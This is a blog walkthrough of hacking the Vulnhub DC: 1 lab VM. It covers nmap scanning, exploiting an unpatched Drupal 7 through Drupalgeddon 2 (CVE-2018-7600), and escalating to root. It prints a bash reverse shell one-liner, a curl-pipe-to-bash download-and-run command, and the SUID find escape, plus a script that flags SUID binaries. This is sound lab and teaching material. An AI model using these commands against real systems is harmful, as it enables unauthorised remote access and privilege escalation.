Hacking DC: 1 - Vulnhub

Michael Ikua
Jul 16, 2019

It’s been a while since I wrote anything, so a series of me hacking through the DC VMs from Vulnhub should be the perfect opportunity.

I’ll skip the part about discovering the target’s IP; if you’ve read the previous articles it should be pretty straightforward.

Service Enumeration

Running a fast SYN scan on all 65535 ports to discover which ports are open (-sS needs root, and --min-rate keeps the full-range scan quick on a lab network):

nmap -sS -p- --min-rate=1000 192.168.56.104

Now we can dive deeper on just the open ports: -sC runs the default nmap scripts and -sV grabs service versions, and -oN saves the output for later.

nmap -sC -sV -p 22,80,111,52587 -oN DC:1.tcpscan 192.168.56.104

HTTP

Drupal 7 is running on Apache according to the nmap output, and we can verify that by opening the site in the browser.

You can also use the Wappalyzer browser extension to identify the Drupal version.

If you’ve come across Drupal before you might have heard of Drupalgeddon.

Good news for us: this Drupal 7 install is unpatched, so it is exploitable by Drupalgeddon 2 (CVE-2018-7600), an unauthenticated remote code execution vulnerability that was fixed in Drupal 7.58 and 8.5.1. Here’s a good repo that has the PoC to verify this.

SSH

SSH turned out not to be vulnerable, so nothing to do here for now.

Exploitation

Running the PoC confirms the vulnerability and gives us remote code execution on the web server.

Getting shell and privilege escalation

The exploit gives a web-shell style prompt, where every command is a separate HTTP request, which is not very convenient, so it’s better to get a proper reverse shell running bash.

I hosted a script called shell.sh on my Kali box (served over HTTP) containing this one line:

bash -i >& /dev/tcp/192.168.56.1/9001 0>&1

Then, at the prompt given by the exploit, I ran:

curl http://192.168.56.1/shell.sh | bash

This way I got a reverse shell on my nc listener on port 9001.

What I like to do after I get shell is run LinEnum to find possible ways to privesc.

Looking through the output, find has its SUID bit set.

We can abuse that to get root privileges!

find . -exec /bin/sh \; -quit

Using this find command from GTFOBins, the /bin/sh spawned by -exec inherits find’s effective UID of 0, so we get root and read the final flag. One caveat: if /bin/sh on the target is bash rather than dash, use /bin/sh -p (the form GTFOBins lists), since bash drops the effective UID when it differs from the real UID.
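To make the SUID step reproducible without a target, here is an added example (not code from the post, LinEnum or GTFOBins) that enumerates SUID binaries under a root and flags the ones whose names appear on a short list of GTFOBins SUID entries. The GTFO_SUID_NAMES list is an assumed partial excerpt, and the demo tree it scans is constructed inline with chmod u+s on ordinary files, so it runs offline as an unprivileged user.

```shell
#!/bin/sh
# Added example: enumerate SUID files and flag known GTFOBins candidates.
# Not taken from the original post, LinEnum or GTFOBins.

# Assumed partial excerpt of binaries GTFOBins documents with a SUID section.
GTFO_SUID_NAMES="find vim nmap python perl bash env cp mv tee awk less more"

# suid_bins ROOT: print every regular file under ROOT with the SUID bit set,
# one path per line. This is the classic check LinEnum performs:
#   find / -type f -perm -4000 2>/dev/null
suid_bins() {
    find "$1" -type f -perm -4000 2>/dev/null
}

# flag_gtfobins ROOT: from the SUID files under ROOT, print "name path" for
# each one whose basename is in GTFO_SUID_NAMES.
flag_gtfobins() {
    suid_bins "$1" | while IFS= read -r path; do
        name=$(basename "$path")
        for known in $GTFO_SUID_NAMES; do
            if [ "$name" = "$known" ]; then
                printf '%s %s\n' "$name" "$path"
                break
            fi
        done
    done
}

# make_demo_tree DIR: constructed sample filesystem with a fake SUID "find"
# and "passwd" plus a non-SUID "ls". No root needed: setting u+s on files
# you own is always allowed.
make_demo_tree() {
    mkdir -p "$1/usr/bin" "$1/bin"
    for f in "$1/usr/bin/find" "$1/usr/bin/passwd" "$1/bin/ls"; do
        printf '#!/bin/sh\n' > "$f"
        chmod 755 "$f"
    done
    chmod u+s "$1/usr/bin/find" "$1/usr/bin/passwd"
}

# Stand-alone run against the demo tree. On a real box: flag_gtfobins /
if [ "${DEMO_RUN:-1}" = 1 ]; then
    demo=$(mktemp -d)
    make_demo_tree "$demo"
    echo "SUID files under $demo:"
    suid_bins "$demo"
    echo "Flagged GTFOBins SUID candidates:"
    flag_gtfobins "$demo"
    rm -rf "$demo"
fi
```

The flagged list is a starting point, not a verdict: passwd is SUID on every Linux box by design and is not flagged, while a SUID find (as on this VM) is flagged because GTFOBins shows a one-liner for it.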

Conclusion

For this VM my goal was just getting root; for future VMs I’ll try to do some post exploitation and explore more ways to exploit and escalate privileges. This VM is aimed at beginners and exploiting it is straightforward.

Twitter: ikuamike

Github: ikuamike
